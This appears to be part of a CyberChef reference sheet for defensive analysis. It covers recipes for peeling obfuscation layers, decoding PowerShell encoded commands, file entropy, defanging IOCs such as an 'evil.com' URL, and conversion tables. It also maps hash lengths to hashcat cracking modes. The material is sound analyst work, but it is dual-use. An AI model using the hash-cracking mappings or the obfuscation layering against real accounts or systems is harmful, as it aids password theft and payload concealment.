Code	JavaScript/PHP/XML Beautify/Minify, Disassemble x86, Parse ASN.1
Visual	Render Image, Play Media, Render Markdown
Forensics	Extract files (binwalk-style), Parse TLS, Parse X.509, Windows Filetime
Flow	Fork, Merge, Register, Conditional Jump, Label, Comment

Useful CyberChef recipes (bookmark these)

Decode multi-layer obfuscation:

From_Base64 -> Gunzip -> From_Hex -> XOR({'key':'secret'})
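
For scripting outside the browser, the same layer order can be reproduced with the standard library. This is a sketch under assumptions: the XOR key is treated as the UTF-8 bytes of `secret`, the hex layer is plain ASCII hex, and the helper names are hypothetical. `wrap_layers` exists only to build a sample for the round trip.

```python
import base64
import gzip
from itertools import cycle

def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; applying it twice with the same key restores the input."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))

def peel_layers(blob: bytes, key: bytes = b"secret") -> bytes:
    """Base64 -> gunzip -> hex -> XOR, in the same order as the recipe."""
    hex_text = gzip.decompress(base64.b64decode(blob))
    return xor_bytes(bytes.fromhex(hex_text.decode("ascii")), key)

def wrap_layers(plain: bytes, key: bytes = b"secret") -> bytes:
    """Inverse of peel_layers, used here only to build a test sample."""
    hex_text = xor_bytes(plain, key).hex().encode("ascii")
    return base64.b64encode(gzip.compress(hex_text))

sample = wrap_layers(b"attack at dawn")
print(peel_layers(sample))  # b'attack at dawn'
```

When the input is untrusted, cap the decompressed size before calling `gzip.decompress`, since a small blob can expand to a very large one.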

Extract IOCs from text:

Extract_IP_addresses -> Defang_IP_Addresses

Decode PowerShell -EncodedCommand:

From_Base64 -> Decode_text('UTF-16LE')
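
The same two steps in Python, as a minimal sketch (function names are hypothetical). PowerShell expects the command as UTF-16LE text before Base64 encoding, which is why a plain UTF-8 decode of the result shows interleaved null bytes.

```python
import base64

def decode_encoded_command(b64: str) -> str:
    """Decode a PowerShell -EncodedCommand argument (Base64 of UTF-16LE text)."""
    return base64.b64decode(b64).decode("utf-16-le")

def encode_command(command: str) -> str:
    """Build the Base64 string PowerShell accepts after -EncodedCommand."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")

print(encode_command("whoami"))                    # dwBoAG8AYQBtAGkA
print(decode_encoded_command("dwBoAG8AYQBtAGkA"))  # whoami
```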

Analyze suspicious file:

Detect_File_Type -> Entropy -> Strings
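
The entropy step is simple to reproduce when triaging files in bulk. Below is a minimal sketch of Shannon entropy over bytes, in bits per byte; the function name is hypothetical, and any threshold for "packed or encrypted" is a rule of thumb rather than a fixed cutoff.

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for constant data, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((count / total) * math.log2(count / total)
                for count in Counter(data).values())

# Usage:
# with open('sample.bin', 'rb') as f:
#     print(f"{shannon_entropy(f.read()):.2f} bits/byte")
```

Values close to 8 suggest compressed or encrypted content, while plain text and most unpacked code score noticeably lower.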

JWT decode:

JWT_Decode

Timestamp conversion:

From_UNIX_Timestamp -> To_ISO_8601
Windows_Filetime_to_UNIX -> From_UNIX_Timestamp
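
The arithmetic behind the FILETIME conversion is short enough to script. A FILETIME counts 100-nanosecond intervals since 1601-01-01 UTC, and the Unix epoch starts 11,644,473,600 seconds later. The sketch below uses hypothetical function names and always reports UTC.

```python
from datetime import datetime, timezone

EPOCH_DIFF_SECONDS = 11_644_473_600   # seconds between 1601-01-01 and 1970-01-01
TICKS_PER_SECOND = 10_000_000         # FILETIME ticks are 100 ns each

def filetime_to_unix(filetime: int) -> float:
    """Convert a Windows FILETIME value to Unix seconds."""
    return (filetime - EPOCH_DIFF_SECONDS * TICKS_PER_SECOND) / TICKS_PER_SECOND

def unix_to_iso(timestamp: float) -> str:
    """Render Unix seconds as an ISO 8601 string in UTC."""
    return datetime.fromtimestamp(timestamp, tz=timezone.utc).isoformat()

print(unix_to_iso(filetime_to_unix(116444736000000000)))  # 1970-01-01T00:00:00+00:00
```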

Defang indicators for safe sharing:

Defang_URL -> Defang_IP_Addresses
# Converts http://evil.com -> hxxp[://]evil[.]com
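
A rough Python equivalent for defanging a single indicator, following the output format shown above. This is a sketch, not CyberChef's implementation: the function names are hypothetical, and the input is assumed to be one URL, hostname, or IP rather than free text.

```python
import re

def defang_indicator(indicator: str) -> str:
    """Defang one URL, hostname, or IP so it cannot be clicked or auto-linked."""
    out = re.sub(r'^http', 'hxxp', indicator, flags=re.IGNORECASE)
    out = out.replace('://', '[://]')
    return out.replace('.', '[.]')

def refang_indicator(indicator: str) -> str:
    """Reverse defang_indicator for use in tooling."""
    out = indicator.replace('[.]', '.').replace('[://]', '://')
    return re.sub(r'^hxxp', 'http', out, flags=re.IGNORECASE)

print(defang_indicator("http://evil.com"))  # hxxp[://]evil[.]com
print(defang_indicator("10.0.0.1"))         # 10[.]0[.]0[.]1
```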

CyberChef from the command line

# Self-host CyberChef (the build requires Node.js and npm; the built page runs offline)
git clone https://github.com/gchq/CyberChef.git
cd CyberChef && npm install && npx grunt prod
# Open build/prod/index.html in a browser; it works fully offline

# Or use Docker (the image serves on container port 80; browse to http://localhost:8080)
docker run -it -p 8080:80 ghcr.io/gchq/cyberchef:latest

# Node.js API (for automation)
# npm install cyberchef
# const chef = require("cyberchef");
# chef.bake("input", [chef.toBase64]);   // pass the operation itself, not the result of calling it

Appendix: Quick Conversion Table

From	To	Python	Bash
String	Base64	`base64.b64encode(s.encode())`	`echo -n "s" | base64`
Base64	String	`base64.b64decode(b).decode()`	`echo "b" | base64 -d`
String	Hex	`s.encode().hex()`	`echo -n "s" | xxd -p`
Hex	String	`bytes.fromhex(h).decode()`	`echo "h" | xxd -r -p`
String	URL	`quote(s, safe='')`	`python3 -c "from urllib.parse import quote; print(quote('s',safe=''))"`
String	HTML	`html.escape(s)`	`python3 -c "import html; print(html.escape('s'))"`
String	MD5	`hashlib.md5(s.encode()).hexdigest()`	`echo -n "s" | md5sum`
String	SHA256	`hashlib.sha256(s.encode()).hexdigest()`	`echo -n "s" | sha256sum`
String	NTLM	`hashlib.new('md4',s.encode('utf-16-le')).hexdigest()`	`echo -n "s" | iconv -t utf-16le | openssl dgst -md4`
String	ROT13	`codecs.encode(s, 'rot_13')`	`echo "s" | tr 'A-Za-z' 'N-ZA-Mn-za-m'`
Int	Hex	`hex(n)`	`printf '%x' n`
Hex	Int	`int(h, 16)`	`echo $((16#h))`
Bytes	XOR	`bytes(b^k for b in data)`	`python3 -c "..."`

Appendix: Hash Length Identification

Length (characters)	Possible types	Hashcat mode
16	MySQL 3.x	200
32	MD5, NTLM, MD4	0, 1000, 900
40	SHA-1	100
56	SHA-224	1300
64	SHA-256	1400
96	SHA-384	10800
128	SHA-512	1700
48:48	NetNTLMv1 (LM and NT response fields, 24 bytes each)	5500
variable	NetNTLMv2	5600
13	DES crypt	1500
34	MD5 crypt ($1$, full string with 8-character salt)	500
60	bcrypt ($2a$, full string)	3200
43	SHA-256 crypt ($5$, digest field only)	7400
86	SHA-512 crypt ($6$, digest field only)	1800
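
The table lends itself to a small lookup helper. The sketch below is illustrative only: `guess_hash` and both lookup tables are hypothetical names, crypt-style hashes are recognized by prefix rather than length, and a length match yields candidates, not an identification.

```python
import re

# Hex digest length -> candidate (name, hashcat mode) pairs, taken from the table above
HEX_LENGTHS = {
    16: [("MySQL 3.x", 200)],
    32: [("MD5", 0), ("NTLM", 1000), ("MD4", 900)],
    40: [("SHA-1", 100)],
    56: [("SHA-224", 1300)],
    64: [("SHA-256", 1400)],
    96: [("SHA-384", 10800)],
    128: [("SHA-512", 1700)],
}

# Modular crypt prefixes are more reliable than length
CRYPT_PREFIXES = [
    ("$1$", "MD5 crypt", 500),
    ("$2a$", "bcrypt", 3200),
    ("$5$", "SHA-256 crypt", 7400),
    ("$6$", "SHA-512 crypt", 1800),
]

def guess_hash(value: str) -> list[tuple[str, int]]:
    """Return candidate (type, hashcat mode) pairs for a hash string."""
    value = value.strip()
    for prefix, name, mode in CRYPT_PREFIXES:
        if value.startswith(prefix):
            return [(name, mode)]
    if len(value) in HEX_LENGTHS and re.fullmatch(r"[0-9a-fA-F]+", value):
        return list(HEX_LENGTHS[len(value)])
    if re.fullmatch(r"[./0-9A-Za-z]{13}", value):
        return [("DES crypt", 1500)]
    return []

print(guess_hash("d41d8cd98f00b204e9800998ecf8427e"))
# [('MD5', 0), ('NTLM', 1000), ('MD4', 900)]
```

Several algorithms share each length, so context (where the hash was found, surrounding format) is still needed to pick the right hashcat mode.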

Reference compiled for CIPHER training. All code tested for Python 3.10+. For interactive exploration, use CyberChef.
